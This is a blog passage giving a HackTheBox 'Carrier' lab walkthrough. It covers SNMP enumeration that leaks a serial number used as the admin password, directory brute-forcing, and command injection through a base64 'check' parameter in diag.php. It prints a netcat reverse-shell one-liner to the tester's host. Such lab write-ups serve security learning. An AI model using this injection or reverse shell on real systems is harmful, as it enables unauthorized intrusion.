首页 > 其他分享 >hackthebox carrier medium

hackthebox carrier medium

时间:2024-03-24 17:56:19浏览次数:24  
标签:Status forever medium hackthebox 00 lft carrier ff 10.10

Recon

NMAP SCAN

namp -sT -p- --min-rate 1000 -oA nmap/ports 10.10.10.105
22/tcp open ssh
80/tcp open http nmap -sT -pxx,xx -sV -oA nmap/version 10.10.10.105 nmap -sU -p- --min-rate 1000 -oA nmap/udp 10.10.10.105
port 161/udp open snmp
nmap -sU -pxx -sV -oA nmap/udpscanversion 10.10.10.105
161/udp open snmp SNMPv1 serer:pysnmp SNMPv3 server(public)

SNMP Information Collect

Go to hacktricks and find some enumerate snmp

Enumerate SNMP 

└─$ snmpwalk -c public -v2c 10.10.10.105
iso.3.6.1.2.1.47.1.1.1.1.11 = STRING: "SN#NET_45JDX23"
iso.3.6.1.2.1.47.1.1.1.1.11 = No more variables left in this MIB View (It is past the end of the MIB tree)

And here we notice the content have a unknown STRING "SN#NET_45JDX23"

Shell as root

Website 80 exploit

 

The index.php is a login page and we need to try get into the backend.

At the first I try sql injection and weak password but failed.

Directory brute

gobuster dir -u http://10.10.10.105 -w /usr/share/wordlsts/dirbuster/directory-list-2.3-.txt
/img (Status: 301)
/doc (Status: 301)
/index.php (Status: 200)
/tools (Status: 301)
/css (Status: 301)
/js (Status: 301)
/tickets.php (Status: 302)
/fonts (Status: 301)
/dashboard.php (Status: 302)
/debug (Status: 301)
/diag.php (Status: 302)
/server-status (Status: 403) 

We follow the directory above one by one.

At the /doc. We have find the index of page.

Look at the error_codes.pdf 

The pdf gives the explanation of the error code.

According to the main page,it give our two error code 45007 and 45009.

Following the error 45009 explanation there exist a admin user account and the type of the password is chassis serail number

In the content of the snmp services we have collected.There exists a string of serail number "NET_45DJX23".

Using admin/NET_45DJX23 login the backend.

 Shell as root

Check out the interact point and we find a verify status button.

Looking at burp,click the button generate a POST request.

POST /diag.php HTTP/1.1
Host: 10.10.10.105
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
Origin: http://10.10.10.105
Connection: close
Referer: http://10.10.10.105/diag.php
Cookie: PHPSESSID=najc6dbvucoqec8bf6kaa70an6
Upgrade-Insecure-Requests: 1

check=cXVhZ2dh

I notice that the value passed to check is base64 encoded and decoded as quagga,which happens to be the string in each of the lines above.

I send it to the repeater and change check to 'cm9vdA==',which is the base64 that encoding of 'root'.I get the list of the response that root processes running on the host.

RCE

I hypothesize that this location have a command execution and maybe like 'ps aux | grep $(echo $_POST[check] | base64 -d)'

In conclusion,I know that the location will pass to the linux bash shell.I can add a semicolon at the end and make the bash run the commond behind the semicolon.

replace the value of the parameter check and send the package.We successfully receive the reverse shell.

FULL shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.22 9999 > /tmp/f

Enumeration

At the first time,I rummage the sensitive directory,Web root directory,I don't find any useful message.

Network Enum

Local IPS

root@r1:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
8: eth0@if9: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 00:16:3e:d9:04:ea brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.99.64.2/24 brd 10.99.64.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::216:3eff:fed9:4ea/64 scope link 
       valid_lft forever preferred_lft forever
10: eth1@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 00:16:3e:8a:f2:4f brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.78.10.1/24 brd 10.78.10.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::216:3eff:fe8a:f24f/64 scope link 
       valid_lft forever preferred_lft forever
12: eth2@if13: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 00:16:3e:20:98:df brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.78.11.1/24 brd 10.78.11.255 scope global eth2
       valid_lft forever preferred_lft forever
    inet6 fe80::216:3eff:fe20:98df/64 scope link 
       valid_lft forever preferred_lft forever

 

标签:Status,forever,medium,hackthebox,00,lft,carrier,ff,10.10
From: https://www.cnblogs.com/lisenMiller/p/18089924

相关文章

  • Medium Design
    思路一:见这篇题解,当然只用看step3之后的就好了思路二:我使用的是转换对象法。从线段的角度不好考虑,我们从元素的角度考虑如果我们已经确定了一个元素\(a_i\)为最大值,我们考虑所有线段如果一个线段不包含\(a_i\),那么肯定不选择,因为他不会让最大值增加,反而可能会让最小值增加如......
  • debian11 网卡报错carrier-changed
    起因今天中午12点多公司某台拥有双网卡(内网和外网)的debian11操作系统的机器内网IP地址发生了变化,经过询问都说没有人动过这台机器的IP地址。这让我感到十分疑惑,没有人改动怎么IP地址怎么还会变化呢?背景这台Debian11的操作系统拥有两张网卡,一张外网网卡,一张内网网卡。由于公......
  • 【HTB】Sherlocks Ore 蓝队 medium
    task1问题:哪个CVE导致了EC2的最初泄露?#文件放在~/htb/Ore目录cdusr/share/grafanals-lacatVERSION #8.2.0搜索grafana8.2.0exploit可得CVE-2021-43798答案:CVE-2021-43798task2问题:请详细说明针对我们组织的威胁行为者(TA)使用的所有恶意IP地址......
  • hackthebox sandworm medium writeup
    Thisisthewriteupforthemediummachine'onlyrforyou'.Topiccoveredinthisarticleare: LFI,commnadinjection,neo4jcipherinjection,maliciouspythonpackagesandcodeexecutionviapipdownload.ShellasuserSubdomainenumeration:ffuf......
  • HackTheBox - Codify [easy]
    打这台靶机时及其古怪。总是莫名其妙断开连接,请求没有响应。提交时表示flag错误等问题访问80端口的web服务,发现使用nodjs和vm2库。搜索到vm2漏洞:SandboxBypassinvm2|CVE-2023-32314|Snyk 可远程执行代码查看当前用户,可登录使用ssh登录,使用linpeas.sh等工具枚举,发......
  • HackTheBox - Drive
    #nmap--top-ports=100010.10.11.235StartingNmap7.94SVN(https://nmap.org)at2024-02-1511:10CSTNmapscanreportfordrive.htb(10.10.11.235)Hostisup(0.12slatency).Notshown:997closedtcpports(reset)PORTSTATESERVICE22/tcpop......
  • E2. Minibuses on Venus (medium version)(卷积加速dp)
    数的范围是在k进制下的n位数一个数是lucky的当且仅当在k进制下,存在一个数位上的数,等于其他数位上的数在模k意义下的和。利用减法原理假设一个数的数位和为s,如果存在一个数,那么有s-x%k=x%k->s%k=2x%k那么我们找到这样的x,就是说在计算和为s的方案数是不能使用这些x类似于dp......
  • hackthebox outdated windows medium
    CONNECTbetweenwindowsandlinuxBloodhoundCollectionGrabthelatestcopyofSharpHound.exefromtheBloodhoundrepo,uploadittoOutdated,workingoutofC:\programdataiwrhttp://10.10.14.5:8888/SharpHound.exe-outfiles.exe.\s.exe-Call2022-0......
  • CF1884C Medium Design
    CF1884CMediumDesign翻译首先可以想到一个性质:覆盖\(\min\)的区间加上一定不优。因此考虑以每个点为\(\max\),判断包含这个位置的所有线段中和的最小值然后就不会了\(QwQ\)原来这里还有一个性质:最小值一定是\(\min(a_1,a_m)\),因为假设作为\(\max\)的点为\(x\),\(1\)......
  • hackthebox absolute insane
     信息收集Payattentiontothelastlinessl-date:wehave7hourclockskew,whichshouldkeepinmindifdoinganykeberosauth.SMB-TCP445smbclient-N-L//10.10.11.181#对面拒绝连接crackmapexecsmbabsolute.htb  #对面存在smbcrackmapexec......